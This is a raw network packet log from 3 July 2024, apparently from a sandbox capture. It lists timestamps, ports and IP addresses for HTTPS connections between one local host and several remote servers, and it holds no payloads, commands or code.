Jul 3, 2024 21:20:01.537056923 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.537102938 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.537147045 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.537152052 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.537209034 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.537209034 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.537364960 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.537409067 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.537486076 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.537486076 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.537492990 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.537539959 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.539313078 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.541357040 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.541399956 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.541476011 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.541481972 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.541548014 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.541548014 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.623533964 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.623583078 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.623640060 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.623657942 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.623697042 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.623697042 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.623991966 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.624054909 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.624063015 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.624088049 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.624135971 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.624135971 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.625144005 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.625207901 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.625247002 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.625252962 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.625266075 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.625308037 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.625628948 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.625674963 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.625695944 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.625701904 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.625745058 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.625745058 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.626394987 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.626455069 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.626492977 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.626498938 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.626542091 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.626542091 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.627322912 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.627367973 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.627398968 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.627404928 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.627430916 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.627474070 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.628036976 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.628096104 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.628130913 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.628139019 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.628182888 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.628182888 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.631329060 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.631373882 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.631444931 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.631444931 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.631450891 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.631499052 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.687572002 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.713448048 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.713500977 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.713565111 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.713574886 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.713599920 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.713613987 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.714067936 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.714114904 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.714139938 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.714144945 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.714167118 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.714199066 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.715910912 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.715951920 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.716011047 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.716017008 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.716075897 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.716243029 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.716542006 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.716588020 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.716624022 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.716629982 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.716655970 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.716677904 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.717211962 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.717255116 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.717305899 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.717312098 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.717329025 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.717361927 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.717942953 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.717982054 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.718013048 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.718019009 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.718048096 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.718071938 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.718741894 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.718784094 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.718889952 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.718889952 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.718897104 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.719126940 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.720757008 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.721352100 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.721396923 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.721440077 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.721446991 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.721508026 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.803322077 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.803370953 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.803426981 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.803436041 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.803464890 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.803478956 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.804541111 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.804585934 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.804615021 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.804620981 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.804656029 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.804676056 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.805053949 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.805095911 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.805191040 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.805191040 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.805197954 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.805255890 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.807827950 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.807873964 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.807935953 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.807941914 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.807976007 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.807991028 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.808712959 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.808754921 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.808789968 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.808794975 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.808832884 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.808950901 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.809364080 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.809417963 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.809448957 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.809453964 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.809484959 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.809499025 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.809870005 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.809911966 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.809950113 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.809954882 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.809999943 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.809999943 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.812033892 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.812076092 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.812139034 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.812144995 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.812170029 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.812237024 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.893589020 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.893616915 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.893722057 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.893722057 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.893734932 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.893882036 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.895247936 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.895263910 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.895384073 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.895384073 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.895390987 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.895500898 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.895962000 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.895977020 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.896069050 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.896080017 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.896143913 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.900969028 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.900985003 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.901106119 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.901113987 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.901190042 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.901540041 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.901585102 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.901602030 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.901607990 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.901637077 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.901654959 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.901681900 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.901741982 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.902187109 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.902204037 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.902246952 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.902251959 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.902265072 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.902286053 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.902297020 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.902297020 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.902304888 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.902357101 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.902357101 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.902904034 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.902919054 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.902998924 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.903004885 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.903371096 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.962877035 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.983493090 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.983510971 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.983578920 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.983593941 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.983654976 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.984446049 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.984474897 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.984529972 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.984536886 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.984561920 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.984561920 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.984749079 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.995651007 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:02.028769970 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:02.028781891 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:02.339986086 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:02.340029955 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:02.340234041 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:02.340529919 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:02.340547085 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:02.711393118 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:02.711435080 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:02.711560965 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:02.711832047 CEST	49739	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:02.711877108 CEST	443	49739	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:02.711968899 CEST	49740	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:02.711985111 CEST	49739	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:02.712009907 CEST	443	49740	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:02.712119102 CEST	49740	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:02.712258101 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:02.712275028 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:02.712488890 CEST	49739	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:02.712505102 CEST	443	49739	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:02.712716103 CEST	49740	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:02.712727070 CEST	443	49740	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:02.817431927 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:02.817666054 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:02.817691088 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:02.818682909 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:02.818741083 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:03.207175970 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:03.207416058 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:03.207453012 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:03.208605051 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:03.208664894 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:03.417594910 CEST	443	49739	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:03.417907953 CEST	49739	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:03.417929888 CEST	443	49739	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:03.419084072 CEST	443	49739	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:03.419148922 CEST	49739	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:03.429493904 CEST	443	49740	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:03.429776907 CEST	49740	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:03.429788113 CEST	443	49740	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:03.430829048 CEST	443	49740	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:03.430905104 CEST	49740	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:03.776762962 CEST	49741	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:20:03.776798964 CEST	443	49741	216.58.206.68	192.168.2.4
Jul 3, 2024 21:20:03.776949883 CEST	49741	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:20:03.777158976 CEST	49741	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:20:03.777170897 CEST	443	49741	216.58.206.68	192.168.2.4
Jul 3, 2024 21:20:03.895582914 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:03.895828009 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:03.907582045 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:03.907702923 CEST	49739	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:03.907777071 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:03.907912016 CEST	443	49739	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:03.921662092 CEST	49740	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:03.921767950 CEST	443	49740	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:03.921977043 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:03.921997070 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:03.925446033 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:03.925463915 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:03.925693035 CEST	49739	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:03.925734997 CEST	443	49739	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:03.925928116 CEST	49740	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:03.925940037 CEST	443	49740	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:03.963129997 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:03.978446007 CEST	49739	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:03.978509903 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:03.978631020 CEST	49740	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:04.028431892 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.028512955 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.028543949 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.028567076 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.028584957 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.028599977 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.028631926 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.029211044 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.029259920 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.029290915 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.029314041 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.029341936 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.029344082 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.029367924 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.029381037 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.029593945 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.029602051 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.029648066 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.029686928 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.029687881 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.029701948 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.029742002 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.030149937 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.030543089 CEST	443	49740	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.030719995 CEST	443	49740	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.030771017 CEST	49740	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:04.033912897 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.033952951 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.034002066 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.034014940 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.034209013 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.036117077 CEST	443	49739	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.036206961 CEST	443	49739	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.036272049 CEST	49739	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:04.037023067 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.037086964 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.037092924 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.037106037 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.037170887 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.037195921 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.037204981 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.037396908 CEST	49738	443	192.168.2.4	151.101.130.137
